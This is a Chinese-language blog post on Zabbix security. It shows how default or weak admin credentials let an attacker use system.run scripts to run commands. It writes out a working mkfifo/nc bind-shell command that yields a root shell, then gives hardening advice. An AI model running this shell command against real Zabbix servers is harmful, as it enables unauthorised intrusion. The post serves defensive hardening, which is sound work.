Zabbix安全:破解弱口令后执行命令,获取shell

如果你的Zabbix的Admin口令太弱或者使用了默认口令(Admin/zabbix),而被黑客破解了口令的话,Zabbix服务器在黑客面前就已经毫无抵抗力了。黑客可以创建“ system.run[command,<mode>] ”监控项执行命令,甚至获取服务器shell,获取root权限。

    先介绍下system.run[command,<mode>]”,这个监控项是agent自带的,使zabbix server可以远程在agent的机器上执行任意命令。方法有二:一是建立监控项,二是通过zabbix_get命令直接远程调用。使agent启用这个监控项要在配置文件里设置EnableRemoteCommands=1。命令执行权限限制于zabbix agent的启动用户,如果你为了方便,把agent的启动用户设置为root的话(AllowRoot=1),这是非常危险的。

wKiom1T5aq-jkcptAAJ65jNc1XY524.jpg

    下面模拟一个场景,展示黑客在获取Zabbix Admin口令的情况下,如何获取服务器的shell,甚至root权限:

    这里利用NetCat(nc)命令打开shell,如果你的系统是RedHat/CentOS系列,nc可以通过yum下载到。

     选择【Administration】->【Scripts】,创建一个script,如下图:

wKioL1T5cdrC573JAALmIjFxlAw432.jpg

    “Execute on”选择Zabbix server,“Commands”里输入:

1
2
mkfifo /tmp/tmp_fifo
cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 2222 > /tmp/tmp_fifo

    上面的意思是打开一个shell,监听2222端口。

    进入【Dashboard】界面,在下面随便点击一个Host,会弹出一个“Scripts”选项卡,点击上面创建的“create shell”,这样上面的命令就会被执行。

wKiom1T5dADzBUAUAAKxQEV-E3M782.jpg

    到zabbix server服务器上可以看到2222号端口已经在监听了。

wKiom1T5dmzRWShWAAF-AanTyDg021.jpg

    下面我们在自己的机器上,用nc命令连接到server的shell:

wKiom1T5d_rwb1P9AAHHTfsOifc478.jpg

     上图显示我们成功获取了zabbix服务器的shell,而且是root权限!这是因为我的zabbix server是以root启动的。

    下面说一下如何对zabbix安全加固,防止这种情况发生:

    1、很重要的一点,zabbix的登录口令一定要复杂,不要用默认口令或弱口令。

    2、zabbix的server和agent都不要以root启动,不要设置AllowRoot=1。

    3、禁止agent执行system.run,不要设置EnableRemoteCommands=1。

    4、经常打安全补丁,如果系统内核版本过低有漏洞的话,即使在zabbix用户下照样能获取root权限。


    参考

    sohu漏洞案例:

    http://www.wooyun.org/bugs/wooyun-2013-023089

    Netcat 命令:

    http://www.oschina.net/translate/linux-netcat-command

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值